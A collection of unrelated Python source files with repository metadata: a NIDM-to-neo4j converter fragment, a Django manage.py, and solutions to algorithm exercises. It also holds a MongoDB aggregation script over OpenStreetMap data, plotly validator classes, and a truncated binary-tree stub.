property_string = "%s %s : '%s'," %(property_string,property_name,property_value)
property_string = property_string[:-1]
return "create (_%s:%s { id : '%s', name :'%s', %s})\n" %(nid,node_type,uid,name,property_string)
else:
return "create (_%s:%s { id : '%s', name :'%s'})\n" %(nid,node_type,uid,name)
# create a relationship
def create_relation(nid1,nid2,relationship):
relationship = relationship.upper().replace("'","").replace("-","")
return "create _%s-[:`%s`]->_%s\n" %(nid1,relationship,nid2)
fields,lookup = get_lookups(ttl)
groups = get_field_groups(ttl)
manual_fields = get_nidm_keys()
for name,uri in manual_fields.iteritems():
if uri not in lookup:
lookup[uri] = name
# First we will save data structures to look up node ids based on URI
nodes = dict()
count = 1
for result in ttl:
rgroup = [x for x in result["@type"] if x in groups][0]
rtype = [x for x in result["@type"] if x != rgroup]
if len(rtype)>0:
rtype = rtype[0]
if rtype in lookup.keys():
result_id = result["@id"].encode("utf-8")
if result_id not in nodes:
nodes[result_id] = count
count +=1
# Define ids of relationships
labeluri = "http://www.w3.org/2000/01/rdf-schema#label"
relations = list()
neo4j = list()
for result in ttl:
rgroup = [x for x in result["@type"] if x in groups][0]
rtype = [x for x in result["@type"] if x != rgroup]
if len(rtype)>0:
rtype = rtype[0]
if rtype in lookup.keys():
            result_id = result["@id"].encode("utf-8")
            node_id = nodes[result_id] # Here is the node_id (result_id must be set before the lookup)
label = lookup[rtype]
if labeluri in result:
name = result[labeluri][0]["@value"].encode("utf-8")
else:
name = "%s_%s" %(label,count)
# Find things we know about
data = [x for x in result.keys() if x in lookup.keys()]
data_labels = [lookup[d] for d in data]
# We will save a list of properties and values for the node
properties = []
for d in range(len(data)):
datum = data[d]
human_label = data_labels[d]
# If it just has an id, assume it's a relationship
if "@id" in result[datum][0].keys():
if result[datum][0]["@id"] in nodes:
relation_id = nodes[result[datum][0]["@id"]]
relationship = lookup[datum]
relations.append(create_relation(node_id,relation_id,relationship))
count+=1
# If it has type and value, it's a property
if "@value" in result[datum][0].keys():
property_name = lookup[datum]
property_value = result[datum][0]["@value"]
properties.append((property_name,property_value))
# Now create the node!
new_node = create_node(node_id,label,result_id,name,properties)
neo4j.append(new_node.encode("utf-8"))
# Now print to file!
filey = open("%s/graph.gist" %(outfolder),'w')
filey.writelines("= %s\n:neo4j-version: 2.0.0\n:author: Nidash Working Group\n:twitter: @nidm\n:tags: nidm:nidash:informatics:neuroimaging:data-structure\n'''\nThis is a neo4j graph to show the turtle file %s.\n'''\n[source, cypher]\n----\n" %(ttl_file,ttl_file))
for node in neo4j:
filey.writelines(node)
for relation in relations:
filey.writelines(relation)
filey.writelines("----\n//graph\nWe can use cypher to query the graph, here are some examples:\n[source, cypher]\n----\nMATCH (p:peak)-[l:ATLOCATION]->(c:coordinate) RETURN c as coordinate, p as peak\n----\n//table\n'''\n[source, cypher]\n----\nMATCH (p:peak)-[l:ATLOCATION]->(c:coordinate) RETURN c.name as name, c.coordinatevector as coordinate, p.equivalent_zstatistic as z, p.name as peak_name, p.pvalue_uncorrected as pvalue_uncorrected\n----\n//table\n'''\n== NIDM Working Group\n* link:http://nidm.nidash.org/[NIDM Standard]\n")
filey.close()
# Now write a Readme to link the gist
filey = open("%s/README.md" %(outfolder),'w')
filey.writelines("### %s\n" %(ttl_file))
filey.writelines("[view graph](http://gist.neo4j.org/?github-"+ username + "%2F" + repo_name + "%2F%2F" + outfolder + "%2Fgraph.gist)\n")
filey.close()
|
[
"vsochat@stanford.edu"
] |
vsochat@stanford.edu
|
82a746e5f60cd833d1722b8ad31c9a47ba6d461b
|
c1cadf7816acbe2c629dfdf5bfe8f35fa14bfd57
|
/archieve/chinese/manage.py
|
5ca0b7c52363f11fa49628eb6fd16998188a8760
|
[] |
no_license
|
luochengleo/timeperception
|
39c5eb0b0cedf16a02867e6a67e2befc4a118c71
|
6c27ceb51e219d9f18898918d4f3158c94836ff4
|
refs/heads/master
| 2021-01-21T04:46:45.315679
| 2016-07-21T14:34:04
| 2016-07-21T14:34:04
| 43,635,809
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "timeperception.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"luochengleo@gmail.com"
] |
luochengleo@gmail.com
|
c30b0daa268e1d472d04f23d05a26aa61c656f59
|
3f84f51751c4191bb81c9df7094578461fb12a2d
|
/典型90問/012_dfs.py
|
ab1e4b903f8a68201dac254f3a00b79daee48b9e
|
[] |
no_license
|
rikukawamura/atcoder
|
7ff49f1bd8534b99d87fe81ef950e1ba77eee8b8
|
09c0cfe3ce25be56d338614a29e996f4106117cd
|
refs/heads/master
| 2023-08-13T21:21:19.058219
| 2021-09-28T10:02:42
| 2021-09-28T10:02:42
| 329,206,601
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 896
|
py
|
def int_sp():
return map(int, input().split())
def li_int_sp():
return list(map(int, input().split()))
def dfs(s_y, s_x):
if s_y<0 or H<=s_y or s_x<0 or W<=s_x or visited[s_y][s_x] or maps[s_y][s_x]==0:
return
visited[s_y][s_x] = 1
for k in range(4):
dfs(s_y+dy[k], s_x+dx[k])
import pdb
import sys
sys.setrecursionlimit(10**8)
H, W = int_sp()
Q = int(input())
maps = [[0]*W for _ in range(H)]
visited = [[0] * W for _ in range(H)]
dx = [0, 1, 0, -1]
dy = [1, 0, -1, 0]
for _ in range(Q):
#pdb.set_trace()
q = li_int_sp()
if q[0] == 1:
maps[q[1]-1][q[2]-1] = 1
else:
start_y, start_x = q[1], q[2]
goal_y, goal_x = q[3], q[4]
dfs(start_y-1, start_x-1)
if visited[goal_y-1][goal_x-1] == 1:
print('Yes')
else:
print('No')
visited = [[0]*W for _ in range(H)]
|
[
"49993650+rikukawamura@users.noreply.github.com"
] |
49993650+rikukawamura@users.noreply.github.com
|
f5ce0b8c0c2a1214e2899cfff23ea25f55ac12b1
|
c546184629526cff0d40180fc89158ea70c5e21c
|
/Basics of data science and machine learning/5. Tuples, Dictionary and sets/8. Pairs with difference K.py
|
68f7a31e266ceb68ab10d834ada99cfcc13e1541
|
[] |
no_license
|
code-drops/coding-ninjas
|
23ad5d3ea813caf3bd1b04a3733b38d3fb844669
|
fd320e1e4f9e996fbe8d2ef25b20d818b18d4d79
|
refs/heads/master
| 2022-11-23T00:22:31.791976
| 2020-07-05T10:22:00
| 2020-07-05T10:22:00
| 277,277,217
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 825
|
py
|
'''
You are given with an array of integers and an integer K. Write a program to find and print all pairs which have difference K.
Take difference as absolute.
'''
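# Illustrative example (added, not part of the original solution): for
# List = [1, 3, 4, 3] and k = 2, the pair "1 3" is printed twice, once for
# each occurrence of 3 in the input.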
def printPairDiffK(List, k):
# Please add your code here
dict = {}
count, itm = 0, ''
for item in reversed(List):
dict[item] = dict.get(item, 0) + 1
# print(dict)
for i in dict:
# print(i)
if i+k in dict:
for m in range(dict[i]):
for n in range(dict[i+k]):
print(i,i+k)
if i-k in dict:
for m in range(dict[i]):
for n in range(dict[i-k]):
print(i-k,i)
dict[i] = 0
# Main
n=int(input())
l=list(int(i) for i in input().strip().split(' '))
k=int(input())
printPairDiffK(l, k)
|
[
"noreply@github.com"
] |
code-drops.noreply@github.com
|
c7be3292d0f7692e0324adf082264120fa54122f
|
8c87224eb6d2935a6d10bff39f8592a1dd43f549
|
/data_overview.py
|
c5b91d99da176f1a06a9543f44356e24da0112eb
|
[] |
no_license
|
charano/data-wrangle-openstreetmaps-data_1
|
ca3024d78acaf80e85ae3c66a1eee9b72dd6c899
|
59458dff3e1b05216b259b4bcf07da32e28abb57
|
refs/heads/master
| 2021-01-10T13:28:59.052062
| 2015-06-06T16:58:10
| 2015-06-06T16:58:10
| 36,987,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,190
|
py
|
import pprint
def get_db(db_name):
from pymongo import MongoClient
client = MongoClient('localhost:27017')
db = client[db_name]
return db
def zip_pipeline():
pipeline = [{"$match" : { "address.postcode" : {"$exists":1}}}
,{"$group" : {"_id" : "$address.postcode",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def city_pipeline():
pipeline = [{"$match" : { "address.city" : {"$exists":1}}}
,{"$group" : {"_id" : "$address.city",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def school_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "school"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def college_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "college"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def university_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "university"}}
,{"$group" : {"_id" : "$name", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def top_user_pipeline():
pipeline = [{"$group" : {"_id" : "$created.user",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
,{"$limit":25}
]
return pipeline
def one_time_user_pipeline():
pipeline = [{"$group" : {"_id" : "$created.user",
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
,{"$limit":1}
]
return pipeline
def top_amenities_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}}}
,{"$group" : {"_id" : "$amenity", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":100}
]
return pipeline
def top_religions_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "place_of_worship"}}
,{"$group" : {"_id" : "$religion", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def top_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":20}
]
return pipeline
def marietta_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant", "address.city" : "Marietta"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def decatur_cuisines_pipeline():
pipeline = [{"$match" : {"amenity" : {"$exists" : 1}, "amenity" : "restaurant", "address.city" : "Decatur"}}
,{"$group" : {"_id" : "$cuisine", "count" : {"$sum":1}}}
,{"$sort":{"count":-1}}
,{"$limit":10}
]
return pipeline
def timestamp_pipeline():
pipeline = [{"$group" : {"_id" : {"year" : {"$year" : "$created.timestamp"}},
"count" : {"$sum" : 1}}}
,{"$sort" : {"count" : -1}}
]
return pipeline
def aggregate(db, pipeline):
result = db.cities.aggregate(pipeline)
return result
if __name__ == '__main__':
db = get_db('test')
#Number of documents
count_result = db.atlanta.find().count()
print 'Number of documents'
pprint.pprint(count_result)
#Number of nodes
nodes_result = db.atlanta.find({"type":"node"}).count()
print 'Number of nodes'
pprint.pprint(nodes_result)
#Number of ways
ways_result = db.atlanta.find({"type":"way"}).count()
print 'Number of ways'
pprint.pprint(ways_result)
#Number of unique users
users_result = len(db.atlanta.distinct("created.user"))
print 'Number of unique users'
pprint.pprint(users_result)
#Top 1 contributing user
top_user_pipeline = top_user_pipeline()
top_user_result = db.atlanta.aggregate(top_user_pipeline)
print 'Top contributor'
pprint.pprint(top_user_result)
#Zipcodes
zip_pipeline = zip_pipeline()
zip_result = db.atlanta.aggregate(zip_pipeline)
print 'Zipcodes'
pprint.pprint(zip_result)
#Cities
city_pipeline = city_pipeline()
city_result = db.atlanta.aggregate(city_pipeline)
print 'Cities'
pprint.pprint(city_result)
#Top amenities
top_amenities_pipeline = top_amenities_pipeline()
amenity_result = db.atlanta.aggregate(top_amenities_pipeline)
print 'Amenities'
pprint.pprint(amenity_result)
#Top religions
top_religions_pipeline = top_religions_pipeline()
top_religions_result = db.atlanta.aggregate(top_religions_pipeline)
print 'Top Religions'
pprint.pprint(top_religions_result)
#Top cuisines
top_cuisines_pipeline = top_cuisines_pipeline()
top_cuisines_result = db.atlanta.aggregate(top_cuisines_pipeline)
print 'Top Cuisines'
pprint.pprint(top_cuisines_result)
#Marietta cuisines
marietta_cuisines_pipeline = marietta_cuisines_pipeline()
marietta_cuisines_result = db.atlanta.aggregate(marietta_cuisines_pipeline)
print 'Marietta Cuisines'
pprint.pprint(marietta_cuisines_result)
#Decatur cuisines
decatur_cuisines_pipeline = decatur_cuisines_pipeline()
decatur_cuisines_result = db.atlanta.aggregate(decatur_cuisines_pipeline)
print 'Decatur Cuisines'
pprint.pprint(decatur_cuisines_result)
#Schools
school_pipeline = school_pipeline()
school_result = db.atlanta.aggregate(school_pipeline)
print 'Schools'
pprint.pprint(school_result)
#Colleges
college_pipeline = college_pipeline()
college_result = db.atlanta.aggregate(college_pipeline)
print 'Colleges'
pprint.pprint(college_result)
#Universities
university_pipeline = university_pipeline()
university_result = db.atlanta.aggregate(university_pipeline)
print 'Universities'
pprint.pprint(university_result)
#Number of records created every year
timestamp_pipeline = timestamp_pipeline()
timestamp_result = db.atlanta.aggregate(timestamp_pipeline)
print 'Number of records created/year'
pprint.pprint(timestamp_result)
|
[
"root@ip-10-47-174-141.ec2.internal"
] |
root@ip-10-47-174-141.ec2.internal
|
934e170f6ff5c24743b86be8f724a5ba2956c4f5
|
4410498f2af839d5d086e2a57d7faadb372bba7c
|
/twitterOA1.py
|
a86365d4d0ebcfe3084d7f44847c804675e3c214
|
[] |
no_license
|
Huijuan2015/MyLeetcodeSolutions
|
264e68c4748caac9fc9a4dc3347ae8eae7241217
|
6d4d078db8f3e6994db0dc25410be265459acc04
|
refs/heads/master
| 2020-04-06T05:14:29.103116
| 2016-11-05T21:57:27
| 2016-11-05T21:57:27
| 53,628,844
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,420
|
py
|
import sys
from string import maketrans
def mask_email(email):
body = email[2:].strip()
at = body.find('@')
return 'E:' + body[0] + '*' * 5 + body[at-1:]
def mask_phone(phone):
body = phone[2:].strip()
table = maketrans('', '')
body = body.translate(table, '- ()')
# print body
if body[0] == '+':
start = '+'
body = body[1:]
mid = '-***-***-'
else:
start = ''
mid = '***-***-'
starts = '*' * (len(body) - 10)
return 'P:' + start + starts + mid + phone[-4:]
for line in sys.stdin.readlines():
line = line.strip()
if line[0] == 'E':
print mask_email(line)
else:
print mask_phone(line)
# --------- (a second, standalone solution follows; kept as a comment so the file parses)
import sys
from string import maketrans
def simplify(exp):
if type(exp) == list:
first = True
nlist = []
for i in xrange(len(exp)):
if type(exp[i]) == list:
if first:
nlist.extend(simplify(exp[i]))
first = False
else:
nlist.append(simplify(exp[i]))
else:
nlist.append(exp[i])
return nlist
else:
return [exp]
def reverse(exp):
if type(exp) == list:
exp = exp[::-1]
for i in xrange(len(exp)):
exp[i] = reverse(exp[i])
return exp
return exp
def parse(s):
s = s.translate(maketrans('', ''), ' ')
expstr, cmds = s.split('/')
cmds = cmds.strip()
ncmds = []
prevS = ''
for cmd in cmds:
if cmd == 'R' or (cmd == 'S' and prevS != cmd):
ncmds.append(cmd)
prevS = cmd
result = []
stack = [result]
for s in expstr:
if s == '(':
stack[-1].append([])
stack.append(stack[-1][-1])
elif s == ')':
stack.pop()
else:
stack[-1].append(s)
return result, ncmds
def extract(exp):
if type(exp) == list:
return '(' + ''.join(map(extract, exp)) + ')'
else:
return exp
# a = [
# # 'A/',
# # 'A B /S',
# # '(AB) C((DE)F)/ R',
# # '(AB) C((DE)F)/ RR',
# '(AB) C((DE)F)/ SSS',
# ]
for line in sys.stdin.readlines():
# for line in a:
exp, cmds = parse(line)
for cmd in cmds:
if cmd == 'S':
exp = simplify(exp)
else:
exp = reverse(exp)
print extract(exp)[1:-1]
|
[
"huijuan1991@hotmail.com"
] |
huijuan1991@hotmail.com
|
47a910a99248290f1384e97ff25bd0b69c23469d
|
bfee538514b48b3f83873c671e4bcaadf0744d69
|
/api/migrations/0001_initial.py
|
bd0b5cfbddd5550b74916de712000ea67229a801
|
[] |
no_license
|
visheshdubey/Dashbike
|
204d9d8411e5afdf0b176b460470a1c6608b52f1
|
5dcb7f5d449034c61ef7dcdef246fbf4209e9e15
|
refs/heads/master
| 2023-07-27T11:35:36.071871
| 2021-09-12T03:03:01
| 2021-09-12T03:03:01
| 178,920,077
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,175
|
py
|
# Generated by Django 2.1.7 on 2019-04-06 05:49
import api.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('Users', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Bike',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('bike_name', models.CharField(default='type..', max_length=500)),
('image', models.ImageField(default='def.jpg', upload_to=api.models.scramble_uploaded_filename, verbose_name='media')),
('thumbnail', models.ImageField(blank=True, default='defthumb.jpg', upload_to='', verbose_name='Thumbnail of uploaded image')),
],
),
migrations.CreateModel(
name='BikeModel',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.CharField(default='type..', max_length=500)),
('count', models.IntegerField(default=0)),
('bike_rate_hr', models.CharField(blank=True, max_length=500, null=True)),
('bike_rate_h', models.CharField(blank=True, max_length=500, null=True)),
('bike_rate_f', models.CharField(blank=True, max_length=500, null=True)),
('bike_isAvailable', models.BooleanField(default=True)),
('isActive', models.BooleanField(default=True)),
('bike_model', models.ForeignKey(default=None, on_delete=django.db.models.deletion.PROTECT, to='api.Bike')),
('dealer', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.DealerDetail')),
],
),
migrations.CreateModel(
name='Booking',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pickup_time', models.DateTimeField(default=None)),
('dob', models.DateTimeField(default=None)),
('duration', models.CharField(default=0.0, max_length=500)),
('transaction_amt', models.CharField(default=0.0, max_length=500)),
('ord_id', models.CharField(default=0.0, max_length=500)),
('transaction_id', models.CharField(default=0.0, max_length=500)),
('is_accepted', models.BooleanField(default=False)),
('is_cancelled', models.BooleanField(default=False)),
('is_Booked', models.BooleanField(default=False)),
('bike_model', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='api.BikeModel')),
('client', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.ClientDetail')),
('dealer', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Users.DealerDetail')),
],
),
]
|
[
"you@example.com"
] |
you@example.com
|
5740cc781e591bcf9a64ae8aec6619af8f1be9d9
|
010279e2ba272d09e9d2c4e903722e5faba2cf7a
|
/contrib/python/plotly/py2/plotly/validators/sankey/node/hoverlabel/__init__.py
|
97dbaf78fea9dc475698f08381ca03fa4d8e4827
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
catboost/catboost
|
854c1a1f439a96f1ae6b48e16644be20aa04dba2
|
f5042e35b945aded77b23470ead62d7eacefde92
|
refs/heads/master
| 2023-09-01T12:14:14.174108
| 2023-09-01T10:01:01
| 2023-09-01T10:22:12
| 97,556,265
| 8,012
| 1,425
|
Apache-2.0
| 2023-09-11T03:32:32
| 2017-07-18T05:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 6,073
|
py
|
import _plotly_utils.basevalidators
class NamelengthsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self,
plotly_name="namelengthsrc",
parent_name="sankey.node.hoverlabel",
**kwargs
):
super(NamelengthsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class NamelengthValidator(_plotly_utils.basevalidators.IntegerValidator):
def __init__(
self, plotly_name="namelength", parent_name="sankey.node.hoverlabel", **kwargs
):
super(NamelengthValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", -1),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class FontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="font", parent_name="sankey.node.hoverlabel", **kwargs
):
super(FontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Font"),
data_docs=kwargs.pop(
"data_docs",
"""
color
colorsrc
Sets the source reference on Chart Studio Cloud
for color .
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on Chart Studio Cloud
for family .
size
sizesrc
Sets the source reference on Chart Studio Cloud
for size .
""",
),
**kwargs
)
import _plotly_utils.basevalidators
class BordercolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self,
plotly_name="bordercolorsrc",
parent_name="sankey.node.hoverlabel",
**kwargs
):
super(BordercolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class BordercolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bordercolor", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BordercolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class BgcolorsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="bgcolorsrc", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BgcolorsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class BgcolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self, plotly_name="bgcolor", parent_name="sankey.node.hoverlabel", **kwargs
):
super(BgcolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
**kwargs
)
import _plotly_utils.basevalidators
class AlignsrcValidator(_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="alignsrc", parent_name="sankey.node.hoverlabel", **kwargs
):
super(AlignsrcValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
role=kwargs.pop("role", "info"),
**kwargs
)
import _plotly_utils.basevalidators
class AlignValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self, plotly_name="align", parent_name="sankey.node.hoverlabel", **kwargs
):
super(AlignValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
role=kwargs.pop("role", "style"),
values=kwargs.pop("values", ["left", "right", "auto"]),
**kwargs
)
|
[
"robot-piglet@yandex-team.com"
] |
robot-piglet@yandex-team.com
|
6f1688c722ecdbc98b0e43a88f1b44403696a034
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/49/usersdata/91/18060/submittedfiles/pico.py
|
24ae75a9ef09d94bf4615d5fc052c73af71e91f6
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 573
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
def pico(lista):
posicao=0
for i in range (0,len(lista)-1,1):
if lista[i]>lista[i+1]:
posicao=i
break
cont=0
for i in range (posicao,len(lista)-1,1):
if lista[i]<lista[i+1]:
cont+=1
if cont==0 and posicao!=0:
return True
else:
return False
n = input('Enter the number of elements in the list: ')
a=[]
for i in range (0,n,1):
    a.append(input('enter a value: '))
if pico(a):
print('S')
else:
print('N')
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
993a6ea2459e638208fb80cbeb1277f085d2f971
|
6a433931dd544e2d9f2b18cff3ce096531b15941
|
/for_loop_sum.py
|
0e496fc2e9d34c9c258fd6d3f0dd3dbb769d5d3d
|
[] |
no_license
|
lunatic-7/python_course_noob-git-
|
b7de1d988c91fd017b645fb1e227e207f3b12b15
|
5e06442151e7a94449ce99158855a608eb035319
|
refs/heads/main
| 2023-08-04T06:55:05.473812
| 2021-09-18T17:20:49
| 2021-09-18T17:20:49
| 407,922,569
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
py
|
# sum from 1 to 10
# 1 + 2 + 3 + ............. 10
# total = 0
# for i in range(1,11):
# total += i
# print(total)
# take input from user.
n = int(input("enter a number : "))
total = 0
for i in range(1,n+1):
total += i
print(total)
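# Quick sanity check (added for illustration): for n = 10 the loop prints 55,
# which matches the closed-form sum n * (n + 1) // 2.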
|
[
"wasif1607@gmail.com"
] |
wasif1607@gmail.com
|
944943ff2bf8b9572fd17ce34f32c985818858d4
|
69b93223fc6794123269022a02e5a1dcf130e698
|
/81_Search_in_Rotated_Sorted_Array_II.py
|
880660e9f25e4a6c94f1ec6ef80ea37cb6c242c8
|
[] |
no_license
|
GuangyuZheng/leet_code_python
|
43b984ce98cc889a7e07151004d347cb03b2d9b2
|
266def94df8245f90ea5b6885fc472470b189e51
|
refs/heads/master
| 2020-09-05T18:12:07.649374
| 2020-02-22T09:37:59
| 2020-02-22T09:37:59
| 220,177,486
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 780
|
py
|
from typing import List
class Solution:
def search(self, nums: List[int], target: int) -> bool:
n = len(nums)
start, end = 0, n-1
while start <= end:
mid = (start + end)//2
if nums[mid] == target:
return True
if nums[start] == nums[mid] == nums[end]:
start += 1
end -= 1
continue
if nums[start] <= nums[mid]:
if nums[start] <= target < nums[mid]:
end = mid - 1
else:
start = mid + 1
else:
if nums[mid] < target <= nums[end]:
start = mid + 1
else:
end = mid - 1
return False
|
[
"583621555@qq.com"
] |
583621555@qq.com
|
37ff904c75ff61fe30e0c84cb5bae9b4da25e2d2
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_207/445.py
|
20b1c67b3718d34b8de06cbe25dcb0f54c5ccc12
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 735
|
py
|
def get_result(R, O, Y, G, B, V):
assert O == 0
assert G == 0
assert V == 0
max_cnt = max(R, Y, B)
if Y + B < max_cnt or R + B < max_cnt or R + Y < max_cnt:
return "IMPOSSIBLE"
cnts = [(R, "R"), (B, "B"), (Y, "Y")]
cnts = sorted(cnts, key=lambda x:x[0], reverse=True)
s = [""] * (3 * max_cnt)
for i in range(cnts[0][0]):
s[3 * i] = cnts[0][1]
for i in range(cnts[1][0]):
s[3 * i + 1] = cnts[1][1]
for i in range(cnts[2][0]):
s[3 * max_cnt - 1 - 3 * i] = cnts[2][1]
return "".join(s)
num_tests = int(input())
for test_id in range(1, num_tests + 1):
N, R, O, Y, G, B, V = map(int, input().strip().split())
res = get_result(R, O, Y, G, B, V)
print("Case #{0}: {1}".format(test_id, res))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
d53dfb47d2536f19b23f7013ea42ec26c225353e
|
3ff660941132bcaed5bfe309861843bd6657ee37
|
/Trees/Print right side.py
|
b8760b5988ef7e07e1d95586be794cfaa5781333
|
[] |
no_license
|
mrunalhirve12/Interviews2
|
04295cebe1946de1f310857d7fbded11a02f8eb1
|
c48bd0a4e1112804da8bdf2d7e43ab0f2ef00469
|
refs/heads/master
| 2023-03-26T14:35:06.029701
| 2021-03-25T21:31:46
| 2021-03-25T21:31:46
| 351,593,537
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,497
|
py
|
"""
Given a binary tree, imagine yourself standing on the right side of it, return the values of the nodes you can see ordered from top to bottom.
Example:
Input: [1,2,3,null,5,null,4]
Output: [1, 3, 4]
Explanation:
1 <---
/ \
2 3 <---
\ \
5 4 <---
"""
# Definition for a binary tree node.
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def rightSideView(self, root):
